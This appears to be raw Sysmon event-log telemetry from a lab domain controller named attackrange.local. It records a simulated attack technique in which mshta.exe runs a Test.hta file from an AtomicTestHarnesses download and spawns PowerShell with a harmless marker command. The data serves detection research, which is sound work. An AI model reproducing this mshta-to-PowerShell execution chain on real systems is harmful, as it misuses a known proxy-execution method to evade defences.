15:59:21.226{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4506-00000000A301}420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023957Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.179{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4606-00000000A301}3316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023956Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.179{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4606-00000000A301}3316C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023955Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.179{7901BC46-5359-6008-4606-00000000A301}33167116C:\Windows\system32\conhost.exe{7901BC46-5359-6008-4506-00000000A301}420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023954Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.179{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5359-6008-4606-00000000A301}3316C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023953Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.163{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023952Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.163{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023951Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.163{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5359-6008-4506-00000000A301}420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023950Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.163{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023949Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.163{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023948Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.163{7901BC46-5359-6008-4406-00000000A301}77967772C:\Windows\SysWOW64\mshta.exe{7901BC46-5359-6008-4506-00000000A301}420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\System32\windows.storage.dll+1240e6(wow64)|C:\Windows\System32\windows.storage.dll+123da1(wow64)|C:\Windows\System32\windows.storage.dll+123e73(wow64)|C:\Windows\System32\windows.storage.dll+124b45(wow64)|C:\Windows\System32\windows.storage.dll+1239f1(wow64)|C:\Windows\System32\windows.storage.dll+125d40(wow64)|C:\Windows\System32\windows.storage.dll+125fbc(wow64)|C:\Windows\System32\windows.storage.dll+1258a5(wow64)|C:\Windows\System32\shell32.dll+1a82b4(wow64)|C:\Windows\System32\shell32.dll+1a818e(wow64)|C:\Windows\System32\shell32.dll+13be0a(wow64)|C:\Windows\System32\shcore.dll+2fffa(wow64) 154100x800000000000000023947Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.171{7901BC46-5359-6008-4506-00000000A301}420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA,IMPHASH=5E0145CEF36FA9BFBA7DE33AA683B8ED{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} 10341000x800000000000000023946Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.132{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023945Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.132{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023944Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.132{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023943Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.116{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023942Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.116{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023941Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.101{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023940Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.101{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023939Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.085{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023938Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.085{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023937Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.085{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023936Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.085{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023935Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.085{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023934Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.085{7901BC46-5359-6008-4306-00000000A301}48561848C:\Windows\explorer.exe{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+8db63|C:\Windows\System32\SHELL32.dll+8da2b|C:\Windows\System32\SHELL32.dll+8d347|C:\Windows\System32\SHELL32.dll+6b47e|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x800000000000000023933Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.088{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=A65AE0DB1DAA6B07C89DCC1E21D3EB42,SHA256=5B6429B98ADF532E6F694C9A6CD1A1943B4AA3D5EA524D4FB353939FD9C61342,IMPHASH=79925B1930721457F5E11BF877806843{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding 10341000x800000000000000023932Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.069{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023931Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.069{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023930Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:21.054{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 